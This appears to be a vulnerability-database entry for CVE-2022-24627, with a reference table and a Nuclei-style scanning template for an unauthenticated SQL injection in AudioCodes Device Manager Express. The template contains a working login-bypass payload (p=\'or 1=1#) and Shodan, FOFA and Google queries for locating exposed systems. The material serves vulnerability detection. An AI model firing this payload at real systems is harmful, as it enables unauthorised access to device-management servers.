| Title | Published | Views | Family |
|---|---|---|---|
| Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal | 27 Feb 2023 00:00 | – | zdt |
| CVE-2022-24627 | 29 May 2023 21:15 | – | attackerkb |
| CVE-2022-24627 | 30 May 2023 00:36 | – | circl |
| AudioCodes Device Manager Express SQL Injection Vulnerability | 24 Feb 2023 00:00 | – | cnnvd |
| CVE-2022-24627 | 29 May 2023 00:00 | – | cve |
| CVE-2022-24627 | 29 May 2023 00:00 | – | cvelist |
| Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE) | 30 Mar 2023 00:00 | – | exploitdb |
| CVE-2022-24627 | 29 May 2023 21:15 | – | nvd |
| CVE-2022-24627 | 29 May 2023 21:15 | – | osv |
| Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal | 23 Feb 2023 00:00 | – | packetstorm |
```yaml
id: CVE-2022-24627

info:
  name: AudioCodes Device Manager Express - SQL Injection
  author: geeknik
  severity: critical
  description: |
    An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
  impact: |
    Unauthenticated attackers can exploit SQL injection in the login form to bypass authentication, extract sensitive VoIP configuration data, and potentially gain administrative access to the AudioCodes Device Manager system.
  remediation: |
    Update AudioCodes Device Manager Express to a version newer than 7.8.20002.47752 that uses parameterized queries and properly validates input.
  reference:
    - https://seclists.org/fulldisclosure/2023/Feb/12
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24627
    - https://github.com/tr3ss/newclei
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24627
    cwe-id: CWE-89
    epss-score: 0.26389
    epss-percentile: 0.97757
    cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: audiocodes
    product: device_manager_express
    shodan-query:
      - title:"Audiocodes"
      - http.title:"audiocodes"
    fofa-query: title="audiocodes"
    google-query: intitle:"audiocodes"
  tags: cve,cve2022,seclists,sqli,audiocodes,vuln

# Request 2 is only sent when request 1 fingerprints the target as AudioCodes.
flow: http(1) && http(2)

http:
  # Request 1: fingerprint the product by its page title; the matcher is
  # internal, so this step never produces a finding on its own.
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "audiocodes</title>")'
        internal: true

  # Request 2: the login form request; the finding is reported only if the
  # response contains a database error string (error-based detection).
  - raw:
      - |
        POST /admin/AudioCodes_files/process_login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=&domain=&p=%5C%27or+1%3D1%23

    matchers:
      - type: word
        part: body
        words:
          - "SQL syntax"
          - "mysql_fetch"
          - "You have an error in your SQL syntax"
        condition: or
# digest: 4a0a0047304502206d2ae4ae79c51d6e33ef217b93a98130432de895a97ca4bf73fd5ddf6dd9725b022100afd4ac64d1d5306c7f3117051a13313d969ddc04bd28c89fe2885240d64ee910:922c64590222798bb761d5b6d8e72950
```